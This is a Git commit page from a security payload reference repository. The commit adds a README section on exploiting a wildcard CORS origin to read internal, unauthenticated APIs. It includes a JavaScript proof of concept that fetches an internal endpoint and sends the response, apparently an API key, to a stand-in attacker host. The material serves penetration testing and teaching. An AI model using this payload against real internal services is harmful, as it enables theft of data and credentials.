ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Added CORS Exploit when wildcard origin is allowed

Browse Source
This commit is contained in:
Emanuel Duss 2020-04-12 15:06:28 +02:00
parent f120024c6b
commit 3e5b367224
1 changed files with 35 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
CORS Misconfiguration/README.md
View File

@ -128,6 +128,41 @@ again.
https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script> https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
``` ```
### Vulnerable Example: Wildcard Origin `*` without Credentials
If the server responds with a wildcard origin `*`, the browser does never send
the cookies. Howver, if the server does not require authentication, it's still
possible to access the data on the server. This can happen on internal servers
that are not accessible from the Internet. The attacker's website can then
pivot into the internal network and access the server's data withotu
authentication.
#### Vulnerable Implementation
```powershell
GET /endpoint HTTP/1.1
Host: api.internal.example.com
Origin: https://evil.com
HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
{"[private API key]"}
```
#### Proof of concept
```js
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://api.internal.example.com/endpoint',true);
req.send();
function reqListener() {
location='//atttacker.net/log?key='+this.responseText;
};
```
## Bug Bounty reports ## Bug Bounty reports
* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574)